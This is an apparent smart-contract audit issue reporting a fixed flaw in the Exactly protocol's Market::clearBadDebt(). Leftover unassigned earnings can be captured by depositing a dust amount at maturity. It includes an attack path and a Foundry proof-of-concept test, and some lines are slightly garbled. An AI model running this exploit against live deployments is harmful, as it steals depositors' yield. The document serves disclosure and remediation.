sherlock-audit / 2024-07-exactly-stacking-contracts-judging

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0x73696d616f - Liquidator will leave a pool with unassigned earnings on `Market::clearBadDebt()` free to claim for anyone when the repaid maturity is not the last #73

Open sherlock-admin3 opened 1 month ago

sherlock-admin3 commented 1 month ago



Liquidator will leave a pool with unassigned earnings on Market::clearBadDebt() free to claim for anyone when the repaid maturity is not the last


This issue remains from the last audit, only a partial fix was applied.

The issue is that in Market::clearBadDebt(), when a maturity is repaid, the unassigned earnings of this pool only go to the earnings accumulator when the last maturity is liquidated. However, if it's not the last maturity, the problem remains in case there is another borrowed maturity, and some user can claim these unassigned earnings just by supplying a few funds. Or if all floatingBackupBorrowed was due to the repaid maturity, and now it is 0, so users can borrow and deposit 1 wei to steal the unassigned earnings.

Root Cause

In Market:661, the earningsAccumulator is only increased [when]([maturity].borrowed == position.principal.position.principalis always 0, asfixedBorrowPositions[maturity][borrower]has been deleted. Thus it will only assign the unassigned earnings whenfixedPools[maturity].borrowed` becomes null after a repayment. This means that as long as there are other borrowed maturities, the unassigned earnings may be stolen.

Internal pre-conditions

  1. Unassigned earnings must exist.
  2. Debt of fixed borrows has to exceed user's collateral.

External pre-conditions


Attack Path

  1. Deposit funds to Market via Market::deposit() for the maturities to borrow, increasing floatingBackupBorrow and generating unassigned earnings.
  2. 1 maturity is borrowed which will be liquidated.
  3. At least 1 other maturity is borrowed so after liquidating the first, fixedPools[maturity].borrowed is not null.
  4. Liquidate one of the maturities, so the unassigned earnings resulting from this maturity will not go to the earningsAccumulator.
  5. Deposit at maturity to capture the unassigned earnings from both maturities, while only contributing liquidity to the other non liquidated one, which may be a dust amount, but the full unassigned earnings are captured to a single user.


Attacker can claim a lot of unassigned earnings just by depositing at maturity enough (may be as small as 1 wei) to cover remaining floatingBackupBorrowed.


Add the following POC to Market.t.sol, showing how a depositMaturity of 10 wei is enough to steal all unassigned maturities.

function test_POC_ClearBadDebt_StealMaturities() external {
  uint256 maxVal = type(uint256).max;

  marketWETH.deposit(100000 ether, address(this));
  marketWETH.borrowAtMaturity(4 weeks, 10000e18, maxVal, address(this), address(this));
  marketWETH.repayAtMaturity(4 weeks, maxVal, maxVal, address(this));

  market.deposit(100 ether, BOB);
  marketWETH.borrowAtMaturity(4 weeks, 60e18, maxVal, BOB, BOB);

  vm.startPrank(ALICE);, 1_000_000 ether);
  weth.approve(address(marketWETH), type(uint256).max);
  marketWETH.deposit(10, ALICE);
  marketWETH.borrowAtMaturity(4 weeks, 1, maxVal, ALICE, ALICE);


  (uint256 coll, uint256 debt) = marketWETH.accountSnapshot(BOB);
  (coll, debt) = market.accountSnapshot(BOB);

  marketWETH.liquidate(BOB, 100_000 ether, market);

  (, , uint256 unassignedEarningsAfter, ) = marketWETH.fixedPools(4 weeks);
  assertEq(unassignedEarningsAfter, 45028532887479452);

  address attacker = makeAddr("attacker");
  deal(address(weth), attacker, 10);
  weth.approve(address(marketWETH), 10);
  marketWETH.depositAtMaturity(4 weeks, 10, 0, attacker);

  (, , unassignedEarningsAfter, ) = marketWETH.fixedPools(4 weeks);
  assertEq(unassignedEarningsAfter, 0);

  // Attacker gets all the unassigned earnings by contributing only 10 
  (uint256 principal, uint256 fee) = marketWETH.fixedDepositPositions(4 weeks, attacker);
  assertEq(principal, 10);
  assertEq(fee, 40525679598731507);


The unassigned earnings should be assigned to the earnings accumulator pro-rata to the floatingBackupBorrowed cleared in the bad debt clearance.

santichez commented 1 month ago

Hi @0xsimao , the mitigation sentence seems a bit unclear. Could you please provide more detail or clarify it further? Thank you.

0xsimao commented 1 month ago

Hey @santichez, smth like this, but the yield goes to the earnings accumulator.

sherlock-admin2 commented 1 month ago

The protocol team fixed this issue in the following PRs/commits:

sherlock-admin2 commented 3 weeks ago

The Lead Senior Watson signed off on the fix.